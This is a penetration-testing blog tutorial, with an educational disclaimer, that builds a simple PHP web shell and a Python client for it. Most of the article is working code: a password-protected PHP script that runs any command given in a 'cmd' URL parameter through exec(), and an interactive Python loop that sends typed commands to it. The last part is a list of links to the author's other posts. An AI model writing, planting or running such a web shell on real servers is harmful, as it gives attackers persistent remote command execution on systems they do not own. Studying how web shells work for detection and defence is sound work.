Build A Simple Web shell
Thilan Dissanayaka Penetration Testing January 03, 2020

Build A Simple Web shell

Disclaimer: This article is strictly for educational purposes. Understanding how web shells work is essential for security professionals who need to defend against them. Do not use this knowledge to access systems without proper authorization. Always practice in controlled lab environments and follow responsible disclosure practices.

What is a Web Shell?

A web shell is a type of code that hackers use to gain control over a web server. It is particularly useful for post-exploitation attacks, and there are various types of web shells available. Some of them work with PHP environments, while others work on ASP servers. Additionally, some web shells provide a reverse connection, while others offer a bind connection.

One of the most well-known examples of a web shell is c99. In this article, we’ll focus on developing a basic web shell that works in a PHP environment.

So why do we need a web shell? Essentially, its primary purpose is to help with post-exploitation tasks.

How it Works

Before we dive into the specifics of how to develop a web shell, let’s go over some essential concepts. At its core, a web shell’s primary function is to run specified commands on a server. In the context of a PHP environment, this means we need to figure out how to execute system commands using PHP scripts.

Let’s get into it.

Basic Shell with HTTP Parameters

As the first part of our tutorial, we are going to build every basic PHP web shell with the help of HTTP. This can be executed using a web browser or a client program and HTTP requests. First, let’s build it and discuss some tricks to improve our shell.

    <?php;
    define('PASSWORD', 'f8b60df48fae35dfa126a1b6ccc3ceed');

    function auth($password)
    {
    	$input_password_hash = md5($password);

    	if (strcmp(PASSWORD, $input_password_hash) == 0) {
    		return TRUE;
    	}else{
    		return FALSE;
    	}
    }


    if (isset($_GET['cmd']) && !empty($_GET['cmd']) && isset($_GET['password'])) {

    	if (auth($_GET['password'])) {
    			echo '<pre>'. exec($_GET['cmd']) .'<pre>';
    	}else{
    		die('Access denide!');
    	}
    }

    ?>

What’s Happening Here?

This PHP script acts as a shell, allowing the user to execute arbitrary commands on the web server where it’s hosted. The script expects two parameters to be passed as part of the URL query string: cmd and password.

The cmd parameter specifies the command that we want to execute on the server, while the password parameter is used to authenticate the user. We have to give the correct password to execute the command. If the password provided matches the predefined password hash, the script will execute the command and return the output to the user. If the password is incorrect, the script will deny access.

The script uses the md5 hashing algorithm to store the predefined password in a hashed format, which makes it harder for an attacker to determine the actual password by looking at the source code.

For example, we can use the following URL to execute a command on the backend server using our shell script.

http://127.0.0.1/shell.php?password=hacksland&cmd=ls

Building a Python Client

So guys, typing URLs in the browser every time is not exactly convenient. As the next step, we are going to build a little Python script to access the shell. This gives us a proper interactive terminal-like experience instead of messing around with browser address bars.

Let’s see how we can do this with the requests library.

```python

import requests
from bs4 import BeautifulSoup

target = \"http://127.0.0.1/shell.php\"
password = \"hacksland\"
while 1:
    cmd = str(input(\"$ \"))
    try:
        r = requests.get(target, params={'cmd': cmd, 'password':password})
        soup = BeautifulSoup(r.text, 'html.parser')
        print(soup.pre.text)
    except requests.exceptions.RequestException as e:
        print(e)
        sys.exit(1)
```

This Python script demonstrates how to use the web shell we built earlier. It imports the requests and BeautifulSoup libraries, which are used to send HTTP requests and parse HTML content, respectively.

The script specifies the URL of the web shell as the target variable, and sets the password as hacksland. It then enters an infinite loop that prompts the user to input a command to execute on the server.

For each iteration of the loop, the script sends an HTTP GET request to the web shell URL with the specified command and password parameters. If the request is successful, the response text is parsed using BeautifulSoup, and the output of the command is printed to the console.

If there is an exception thrown during the request, such as a connection error, the script prints the error message and exits.

Wrapping Up

So that’s pretty much it. We built a basic PHP web shell with password authentication and a Python client to interact with it. This is obviously a very simplified version compared to something like c99, but it covers the core concepts of how web shells work under the hood.

If you are a penetration tester or a security researcher, understanding how these things are built helps you detect and defend against them. Knowing what to look for in code reviews and server logs makes a huge difference when you are on the blue team side of things.

Stay curious, keep learning, and always hack responsibly.

ALSO READ
Blockchain 0x000 – Understanding the Fundamentals
May 21, 2020 Web3 Development
Blockchain 0x000 – Understanding the Fundamentals

Imagine a world where strangers can exchange money, share data, or execute agreements without ever needing to trust a central authority. No banks, no intermediaries, no single point of failure yet...

Identity and Access Management (IAM)
May 11, 2020 Identity & Access Management
Identity and Access Management (IAM)

Who are you — and what are you allowed to do? That's the fundamental question every secure system must answer. And it's exactly what Identity and Access Management (IAM) is built to solve.

How I built a web based CPU Simulator
May 07, 2020 Pet Projects
How I built a web based CPU Simulator

As someone passionate about computer engineering, reverse engineering, and system internals, I've always been fascinated by what happens "under the hood" of a computer. This curiosity led me to...

Writing a Shell Code for Linux
Apr 21, 2020 Exploit Development
Writing a Shell Code for Linux

Shellcode is a small piece of machine code used as the payload in exploit development. In this post, we write Linux shellcode from scratch — starting with a simple exit, building up to spawning a shell, and explaining every decision along the way.

Exploiting a Stack Buffer Overflow on Windows
Apr 12, 2020 Exploit Development
Exploiting a Stack Buffer Overflow on Windows

In a previous tutorial we discusses how we can exploit a buffer overflow vulnerability on a Linux machine. I wen through all theories in depth and explained each step. Now today we are going to jump...

Access Control Models
Apr 08, 2020 Identity & Access Management
Access Control Models

Access control is one of the most fundamental concepts in security. Every time you set file permissions, assign user roles, or restrict access to a resource, you're implementing some form of access control. But not all access control is created equal...

Exploiting a Stack Buffer Overflow on Linux
Apr 01, 2020 Exploit Development
Exploiting a Stack Buffer Overflow on Linux

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

Basic concepts of Cryptography
Mar 01, 2020 Cryptography
Basic concepts of Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Common Web Application Attacks
Feb 05, 2020 Application Security
Common Web Application Attacks

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these...

Remote Code Execution (RCE)
Jan 02, 2020 Application Security
Remote Code Execution (RCE)

Remote Code Execution (RCE) is the holy grail of application security vulnerabilities. It allows an attacker to execute arbitrary code on a remote server — and the consequences are as bad as it sounds. In this post, we'll go deep into RCE across multiple languages, including PHP, Java, Python, and Node.js.

AUTHOR
Thilan Dissanayaka

Thilan Dissanayaka

Security Engineer at WSO2. Passionate about clean code and cybersecurity. Building secure, scalable applications with modern technologies.

CATEGORIES